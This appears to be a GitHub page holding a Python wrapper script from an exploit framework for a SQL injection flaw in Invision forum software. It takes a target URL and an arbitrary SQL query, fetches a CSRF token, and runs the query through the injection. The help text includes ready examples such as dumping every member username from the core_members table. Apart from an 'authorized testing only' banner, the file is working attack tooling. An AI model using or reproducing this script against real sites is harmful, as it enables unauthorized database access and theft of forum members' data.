-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcustom_query_example.py
More file actions
72 lines (53 loc) · 2.24 KB
/
Copy pathcustom_query_example.py
File metadata and controls
72 lines (53 loc) · 2.24 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python3
"""
Custom SQL Query Example
This script demonstrates how to use the exploit framework to extract
custom data from the database using your own SQL queries.
Usage:
python custom_query_example.py -u http://target.com/forum/ -q "SELECT version()"
"""
import sys
import argparse
sys.path.insert(0, '..')
from invision_sqli_exploit import InvisionSQLiExploit
from colorama import Fore, Style, init
init(autoreset=True)
def main():
parser = argparse.ArgumentParser(
description="Extract custom data using SQL injection",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Example Queries:
Database version:
python custom_query_example.py -u http://target.com/ -q "SELECT version()"
Database name:
python custom_query_example.py -u http://target.com/ -q "SELECT database()"
All usernames:
python custom_query_example.py -u http://target.com/ -q "SELECT GROUP_CONCAT(name) FROM core_members"
Count members:
python custom_query_example.py -u http://target.com/ -q "SELECT COUNT(*) FROM core_members"
"""
)
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-q', '--query', required=True, help='SQL query to execute')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
args = parser.parse_args()
# Display disclaimer
print(f"\n{Fore.RED}{'='*70}")
print(f"{Fore.RED}CUSTOM QUERY EXTRACTION - Authorized Testing Only")
print(f"{Fore.RED}{'='*70}{Style.RESET_ALL}\n")
# Initialize exploit
exploit = InvisionSQLiExploit(args.url, args.verbose)
# Fetch CSRF token
if not exploit.fetch_csrf_token():
print(f"{Fore.RED}[-] Failed to initialize exploit{Style.RESET_ALL}")
sys.exit(1)
# Execute custom query
print(f"\n{Fore.CYAN}[*] Executing query: {Fore.YELLOW}{args.query}{Style.RESET_ALL}")
result = exploit.sql_injection(args.query)
if result:
print(f"\n{Fore.GREEN}[+] Result: {Fore.YELLOW}{result}{Style.RESET_ALL}\n")
else:
print(f"\n{Fore.RED}[-] Query returned no results or failed{Style.RESET_ALL}\n")
if __name__ == "__main__":
main()